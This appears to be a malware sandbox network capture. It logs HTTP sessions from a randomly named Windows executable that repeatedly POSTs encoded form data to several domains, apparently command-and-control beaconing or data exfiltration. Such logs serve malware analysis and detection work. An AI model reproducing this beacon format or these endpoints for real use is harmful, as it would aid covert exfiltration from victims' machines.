                                                      Content-Encoding: gzip
                                                      Content-Length: 14879
                                                      Content-Type: text/html; charset=UTF-8


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      11 | 192.168.2.6 | 49738 | 192.185.208.8 | 80 | 6800 | C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:57:23.757781029 CEST | 1654 | OUT | POST /2769/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 1249
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.epicbazaarhub.com
                                                      Origin: http://www.epicbazaarhub.com
                                                      Referer: http://www.epicbazaarhub.com/2769/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:57:24.370687008 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                      Date: Wed, 03 Jul 2024 15:57:24 GMT
                                                      Server: Apache
                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                      Link: <https://epicbazaarhub.com/wp-json/>; rel="https://api.w.org/"
                                                      Upgrade: h2,h2c
                                                      Connection: Upgrade, close
                                                      Vary: Accept-Encoding
                                                      Content-Encoding: gzip
                                                      Content-Length: 14879
                                                      Content-Type: text/html; charset=UTF-8


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      12 | 192.168.2.6 | 49740 | 192.185.208.8 | 80 | 6800 | C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:57:26.290399075 CEST | 350 | OUT | GET /2769/?OdjTHtuX=rQ9MRvShllEvhf19NmQGPjdBfvwxqGfh/iQ/JyzvIKd3JVnhiEf6Ad8S1fm4YmYs4WBXtXN2+GWeVsdjOCq4N3yCg9FNbaHUg89/agQhGCosY8uNQEp6VxplmSeNniynJ3fH1F8=&Y6vp=3PLd8j HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US,en;q=0.9
                                                      Connection: close
                                                      Host: www.epicbazaarhub.com
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:57:26.862763882 CEST | 510 | IN | HTTP/1.1 301 Moved Permanently
                                                      Date: Wed, 03 Jul 2024 15:57:26 GMT
                                                      Server: Apache
                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                      X-Redirect-By: WordPress
                                                      Upgrade: h2,h2c
                                                      Connection: Upgrade, close
                                                      Location: http://epicbazaarhub.com/2769/?OdjTHtuX=rQ9MRvShllEvhf19NmQGPjdBfvwxqGfh/iQ/JyzvIKd3JVnhiEf6Ad8S1fm4YmYs4WBXtXN2+GWeVsdjOCq4N3yCg9FNbaHUg89/agQhGCosY8uNQEp6VxplmSeNniynJ3fH1F8=&Y6vp=3PLd8j
                                                      Content-Length: 0
                                                      Content-Type: text/html; charset=UTF-8


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      13 | 192.168.2.6 | 49741 | 121.254.178.230 | 80 | 6800 | C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:57:32.613265038 CEST | 605 | OUT | POST /wvam/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 213
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.rz6grmvv.shop
                                                      Origin: http://www.rz6grmvv.shop
                                                      Referer: http://www.rz6grmvv.shop/wvam/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:57:33.529656887 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                                      Date: Wed, 03 Jul 2024 15:57:32 GMT
                                                      Server: Apache
                                                      Content-Length: 203
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wvam/ was not found on this server.</p></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      14 | 192.168.2.6 | 49742 | 121.254.178.230 | 80 | 6800 | C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:57:35.154019117 CEST | 629 | OUT | POST /wvam/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 237
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.rz6grmvv.shop
                                                      Origin: http://www.rz6grmvv.shop
                                                      Referer: http://www.rz6grmvv.shop/wvam/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Data Ascii: OdjTHtuX=krlYJUqdYS9K2UvUoLcLhYfwsctd14ocv2g1crLa/Oudw+N7TXQ31QBpRTgS4GmPokxGjE3V9UgCK3GRbjU8BOB6QlkL1dv06tGjEH75yJ9isaeVTJH5pK9d4bbbBCroUJjEEgUpPZ6aI7RgJwzjd3OGF0k1gVQvYeK0iMaxf3ckdhB9M3sRt3AhguyamPAu+NPPHf6sz8qadoDuEL/c7Z/gDn3Muun12w==
                                                      Jul 3, 2024 17:57:36.117645025 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                                      Date: Wed, 03 Jul 2024 15:57:35 GMT
                                                      Server: Apache
                                                      Content-Length: 203
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wvam/ was not found on this server.</p></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      15 | 192.168.2.6 | 49743 | 121.254.178.230 | 80 | 6800 | C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:57:37.679713011 CEST | 1642 | OUT | POST /wvam/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 1249
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.rz6grmvv.shop
                                                      Origin: http://www.rz6grmvv.shop
                                                      Referer: http://www.rz6grmvv.shop/wvam/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:57:39.011392117 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                                      Date: Wed, 03 Jul 2024 15:57:37 GMT
                                                      Server: Apache
                                                      Content-Length: 203
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wvam/ was not found on this server.</p></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      16 | 192.168.2.6 | 49744 | 121.254.178.230 | 80 | 6800 | C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:57:40.212461948 CEST | 346 | OUT | GET /wvam/?Y6vp=3PLd8j&OdjTHtuX=ppN4Kg7gaCRo+jf4iLEmna60kcJd+oo7/wZIRMT4+Man5OlGV28GmQNPMVld/mi8klF/kBnYjgc4RUC2chY7WuIAYm4xk+Ll6sKGI2rWgbxJmoqgO5rVx7RJwqzCMQvvfrLjQU4= HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US,en;q=0.9
                                                      Connection: close
                                                      Host: www.rz6grmvv.shop
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:57:41.145848989 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                                      Date: Wed, 03 Jul 2024 15:57:40 GMT
                                                      Server: Apache
                                                      Content-Length: 203
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wvam/ was not found on this server.</p></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      17 | 192.168.2.6 | 49745 | 203.161.49.220 | 80 | 6800 | C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:57:46.199600935 CEST | 605 | OUT | POST /oui5/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 213
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.hellokong.xyz
                                                      Origin: http://www.hellokong.xyz
                                                      Referer: http://www.hellokong.xyz/oui5/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Data Ascii: OdjTHtuX=fDzsK/XJya2uRc5MnmcmtQ8Fcdnz2OubmyW515BwoeAQli8AMat19OgMvrM87SKbeUdnEPNs+YRA2NeSpCRWUXUABSikKZSDT55+LCi5Lwmu6EkILOzWmyN8irZSsoPvUxIam3aPBzujUXkUcq7r1B+xTamynV8sHjqmjjlFHIT6oQKxpYrANMWsthCxV5CQxvKLE0Jp3zR1
                                                      Jul 3, 2024 17:57:46.784719944 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                      Date: Wed, 03 Jul 2024 15:57:46 GMT
                                                      Server: Apache
                                                      Content-Length: 389
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      18 | 192.168.2.6 | 49746 | 203.161.49.220 | 80 | 6800 | C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:57:48.736191034 CEST | 629 | OUT | POST /oui5/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 237
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.hellokong.xyz
                                                      Origin: http://www.hellokong.xyz
                                                      Referer: http://www.hellokong.xyz/oui5/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Data Ascii: OdjTHtuX=fDzsK/XJya2uQ8JMgGgmlQ93ANnz9uuXmyK514FaoqsQiAkAePR18OgMlLMl/SKqeURFEOxs+e9A2PGSpUZVWHUCOyimH5SDT55+LDTkLzWu73MIZrPRoSN/07ZSooPrUxJPm1+pB2ijUWUUd/Ho/B/4Oqnb0QZbey7881wofJaQtmLr1rrjfc2utjaDVZC6zvyLWjFO4H0WSDEAprycsuRbsGg3R4jiag==
                                                      Jul 3, 2024 17:57:49.363711119 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                      Date: Wed, 03 Jul 2024 15:57:49 GMT
                                                      Server: Apache
                                                      Content-Length: 389
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      19 | 192.168.2.6 | 49747 | 203.161.49.220 | 80 | 6800 | C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:57:51.282027960 CEST | 1642 | OUT | POST /oui5/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 1249
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.hellokong.xyz
                                                      Origin: http://www.hellokong.xyz
                                                      Referer: http://www.hellokong.xyz/oui5/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:57:51.896353006 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                      Date: Wed, 03 Jul 2024 15:57:51 GMT
                                                      Server: Apache
                                                      Content-Length: 389
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      20 | 192.168.2.6 | 49748 | 203.161.49.220 | 80 | 6800 | C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:57:53.806934118 CEST | 346 | OUT | GET /oui5/?OdjTHtuX=SBbMJInblZiNUqJtj2t3oAZeaf7w1Mr63FaPzYR5npk3jTg+edZF9NME4tF9tViJCHx7c4tSq6N/qcOwzg98IChDG2ekcZOWcYJRK2znKimA3GQ/fbvAwxxdlKlVh8HBUwdv3Sg=&Y6vp=3PLd8j HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US,en;q=0.9
                                                      Connection: close
                                                      Host: www.hellokong.xyz
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:57:54.429059982 CEST | 548 | IN | HTTP/1.1 404 Not Found
                                                      Date: Wed, 03 Jul 2024 15:57:54 GMT
                                                      Server: Apache
                                                      Content-Length: 389
                                                      Connection: close
                                                      Content-Type: text/html; charset=utf-8
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      21 | 192.168.2.6 | 49749 | 217.160.0.84 | 80 | 6800 | C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:57:59.470967054 CEST | 632 | OUT | POST /s24g/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 213
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.architect-usschool.com
                                                      Origin: http://www.architect-usschool.com
                                                      Referer: http://www.architect-usschool.com/s24g/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Data Ascii: OdjTHtuX=1pgFM2Bg2oSjLj4RFb0r2MnyHQidXi2ZjvVDynNPe+RPYxDZ64b5YB6QswRxprDWy8lPOWz+VbRZ20Ab8JR+RyENI3ghl7WV/AeJjPYs2z8sSiD5m7YNDdTm49EUQAxJEKFPSin4Zj33TV/zNhgWZeGr7LvvcMf+VF4WfzM5eUNqYOc2kCiRq/gC/QtnM3Q63Z6hqbNSKO9P
                                                      Jul 3, 2024 17:58:00.511090040 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Date: Wed, 03 Jul 2024 15:58:00 GMT
                                                      Server: Apache
                                                      X-Powered-By: PHP/8.2.20
                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                      Link: <http://architect-usschool.com/wp-json/>; rel="https://api.w.org/"
                                                      Content-Encoding: gzip


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      22 | 192.168.2.6 | 49750 | 217.160.0.84 | 80 | 6800 | C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:58:02.010878086 CEST | 656 | OUT | POST /s24g/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 237
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.architect-usschool.com
                                                      Origin: http://www.architect-usschool.com
                                                      Referer: http://www.architect-usschool.com/s24g/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Data Ascii: OdjTHtuX=1pgFM2Bg2oSjKDIRH60r3sn9IwidBS2djvZDylgUeMFPZTLZ55b5Vh6QkQR02bCUy8ptOTL+VfxZ2wEb8eF/QiEPCngj6rWV/AeJjPMK2zEsSRb5mfEOAdTpvNEUUAwCEKFpSmuTZmz3TUPzcQgVDOHikbuuMej0X1toeAkJKGd9UYds4xiy4vAA/S1VMXQQ1ZCh4MB1F6Ys4thUAvtYuxmAi549qkHj4w==
                                                      Jul 3, 2024 17:58:03.042216063 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Date: Wed, 03 Jul 2024 15:58:02 GMT
                                                      Server: Apache
                                                      X-Powered-By: PHP/8.2.20
                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                      Link: <http://architect-usschool.com/wp-json/>; rel="https://api.w.org/"
                                                      Content-Encoding: gzip


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      23 | 192.168.2.6 | 49751 | 217.160.0.84 | 80 | 6800 | C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:58:04.577734947 CEST | 1669 | OUT | POST /s24g/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 1249
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.architect-usschool.com
                                                      Origin: http://www.architect-usschool.com
                                                      Referer: http://www.architect-usschool.com/s24g/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Data Ascii: OdjTHtuX= [TRUNCATED]
                                                      Jul 3, 2024 17:58:05.768886089 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Date: Wed, 03 Jul 2024 15:58:05 GMT
                                                      Server: Apache
                                                      X-Powered-By: PHP/8.2.20
                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                      Link: <http://architect-usschool.com/wp-json/>; rel="https://api.w.org/"
                                                      Content-Encoding: gzip


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      24 | 192.168.2.6 | 49752 | 217.160.0.84 | 80 | 6800 | C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:58:07.119601965 CEST | 355 | OUT | GET /s24g/?Y6vp=3PLd8j&OdjTHtuX=4rIlPCx72NWCI0QJXJwD+tzjHhGgLlyDkrck6XhMS8VcXSbKvpDPBj6V0V8nuLzRy/FwKWDUEv1cw0ImnsIqFnkVImpc8YyZ7gWSicgk/ENTSAvixeUyT+Tq9osdZT4ae7dFHSM= HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US,en;q=0.9
                                                      Connection: close
                                                      Host: www.architect-usschool.com
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:58:07.989995003 CEST | 505 | IN | HTTP/1.1 301 Moved Permanently
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Date: Wed, 03 Jul 2024 15:58:07 GMT
                                                      Server: Apache
                                                      X-Powered-By: PHP/8.2.20
                                                      Expires: Wed, 03 Jul 2024 16:58:07 GMT
                                                      Cache-Control: max-age=3600
                                                      X-Redirect-By: WordPress
                                                      Location: http://architect-usschool.com/s24g/?Y6vp=3PLd8j&OdjTHtuX=4rIlPCx72NWCI0QJXJwD+tzjHhGgLlyDkrck6XhMS8VcXSbKvpDPBj6V0V8nuLzRy/FwKWDUEv1cw0ImnsIqFnkVImpc8YyZ7gWSicgk/ENTSAvixeUyT+Tq9osdZT4ae7dFHSM=
                                                      Data Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      25 | 192.168.2.6 | 49754 | 91.195.240.19 | 80 | 6800 | C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:58:13.072691917 CEST | 614 | OUT | POST /3jr0/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 213
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.easybackpage.net
                                                      Origin: http://www.easybackpage.net
                                                      Referer: http://www.easybackpage.net/3jr0/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Data Ascii: OdjTHtuX=P4P7OBpLb5mk09AgOqNWV5yFVkG3wiw6dC/Y39cbZ5RvAUkJ2RivkrBOjfNPpOFSli13f8rJVGU4StzxZT3BqbzSE46ah2kmsJqn2HuAn+ANwIjOVmgUaSx/1QADLcqqf8EZjHPEZ8lIxbGLJZTL7dZTPNDb5FdMp8bTv1cGBjROLVmJwF7eb8vvWSvQ4lb1IJ7iCRRb5In9
                                                      Jul 3, 2024 17:58:13.707123041 CEST | 305 | IN | HTTP/1.1 405 Not Allowed
                                                      date: Wed, 03 Jul 2024 15:58:13 GMT
                                                      content-type: text/html
                                                      content-length: 154
                                                      server: Parking/1.0
                                                      connection: close
                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                      Session ID   Source IP     Source Port   Destination IP   Destination Port   PID    Process
                                                      26           192.168.2.6   49755         91.195.240.19    80                 6800   C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Timestamp                             Bytes transferred   Direction   Data
                                                      Jul 3, 2024 17:58:15.607995033 CEST   638                 OUT         POST /3jr0/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 237
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.easybackpage.net
                                                      Origin: http://www.easybackpage.net
                                                      Referer: http://www.easybackpage.net/3jr0/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Data Ascii: OdjTHtuX=P4P7OBpLb5mk1Z8gNNRWTZyaWkG3iiw+dDDY38YLMfBvAxgJ3QivnrBO7vNKtOFbli5Jf5TJVGA4SoPxZhfCrLzHfI6c/GkmsJqn2H6mn+INx4zOangXUyxg/wADBMquf8F+jGj+Z5hIxfCLJs/MxdZdBtCqxQEVt/23p3E/ChZ/HDnTs279JsPtWQ3i4FbfKJDiQGd828Ceuup3M0g4t5tZr9ZKILQXpg==
                                                      Jul 3, 2024 17:58:16.257267952 CEST   305                 IN          HTTP/1.1 405 Not Allowed
                                                      date: Wed, 03 Jul 2024 15:58:16 GMT
                                                      content-type: text/html
                                                      content-length: 154
                                                      server: Parking/1.0
                                                      connection: close
                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                      Session ID   Source IP     Source Port   Destination IP   Destination Port   PID    Process
                                                      27           192.168.2.6   49756         91.195.240.19    80                 6800   C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Timestamp                             Bytes transferred   Direction   Data
                                                      Jul 3, 2024 17:58:18.133800030 CEST   1651                OUT         POST /3jr0/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 1249
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.easybackpage.net
                                                      Origin: http://www.easybackpage.net
                                                      Referer: http://www.easybackpage.net/3jr0/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:58:18.794671059 CEST   305                 IN          HTTP/1.1 405 Not Allowed
                                                      date: Wed, 03 Jul 2024 15:58:18 GMT
                                                      content-type: text/html
                                                      content-length: 154
                                                      server: Parking/1.0
                                                      connection: close
                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                      Session ID   Source IP     Source Port   Destination IP   Destination Port   PID    Process
